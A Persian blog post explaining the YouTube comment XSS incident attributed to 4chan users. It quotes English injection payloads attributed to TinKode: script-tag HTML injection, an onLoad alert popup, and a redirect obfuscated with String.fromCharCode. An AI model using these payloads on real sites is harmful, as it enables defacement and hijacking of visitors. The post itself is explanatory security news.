ایران جستجو

هر چی بخوای اینجا پیدا میشه!

ایران جستجو

هر چی بخوای اینجا پیدا میشه!

چگونه یوتیوب هک شد؟(همراه با کد)


حتما اخبار هک شدن یوتیوب را دو روز پیش شنیدید. در اینجا قصد داریم به آناتومی هک شدن بزرگترین سایت حاوی فایلهای مولتی مدیا بپردازیم تا با اطلاعا از نوع حملات به امنیت اطلاعات بیشتر بها دهیم.

اخبار از این قرار است که کاربران عضو فوروم 4chan با دستکاری سیستم کامنت گذاری یوتیوب کاربرانی که قصد دیدن صفحات مختلف را داشتند منحرف کرده و صفحات دیگری روی سایت نمایان می شد. (آنها این کار را علیه خواننده ای بنام جاستین که صفحاتش روی یوتیوب بود، انجام دادند.) در واقع مکانیسم امنیتی بکار رفته در صفحات وب از این طریق دور زده می شود و حمله کننده با دسترسی کامل می تواند اطلاعات حساس کاربر قربانی دسترسی پیدا کند. این کار از طریق تزریق کد مخرب عملیاتی می شود. سایر کاربران از این روش استفاده کرده و کاربرانی که قصد دیدن ویدئو ها را داشتند به صفحات انحرافی می کشاندند. بیش از 2 ساعت سیستم کامنت گذاری یوتیوب قطع شده و کارشناسان آنرا از حالت دیفالت در آورده و مجددا تنظیم نمودند.


اما حمله از راه XSS بوده است. حفره ای است روی صفحه وب که با تزریق اسکریپتی سایر کاربران می توانند آنرا ببینند. حمله کننده کنترل دسترسی به صفحه خاص را از آن خود می کند. اولین گزارش از این نوع حفره در دهه 1990 گزارش شد. 80 درصد از نوع حملات ثبت شده در شرکت امنیتی سیمانتک در سال 2007 از این نوع بوده است.

تگی به صورت  اسکریپت در ابتدای کامنت توسط هکر گذاشته شده و محتویات مخرب چاپ شده و هر کسی روی آن کلیک کند به طور نا خواسته به دستور یا کامند مورد علاقه هکر جواب داده و مثلا صفحه ای انحرافی با شده و یا پاپ آپ غیر ضروری مورد علاقه هکر روی صفحه اش باز می شد.

 

نمونه ای از اسکریپت مورد نظر را می توانید در زیر ببینید:

How you can activate HTML in comments? It's very simple. With:

<script>HTML Code

Example:

<script><h1> Visit Insecurity.Ro - ISR Security Team <blink><marquee><br><br>TinKode

And for popup:

<script><BODY onLoad="alert('Visit Insecurity.ro - TinKode');"

If you want to make redirect:

<script>Zbody onLoad="document.write('<script>window.location = String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 105, 110, 115, 101, 99, 117, 114, 105, 116, 121, 46, 114, 111, 47);</script>');";

If you add this comment the page will be auto redirected to www.insecurity.ro

منبع: وبلاگ علیرضا خراسانی

نظرات 0 + ارسال نظر
برای نمایش آواتار خود در این وبلاگ در سایت Gravatar.com ثبت نام کنید. (راهنما)
ایمیل شما بعد از ثبت نمایش داده نخواهد شد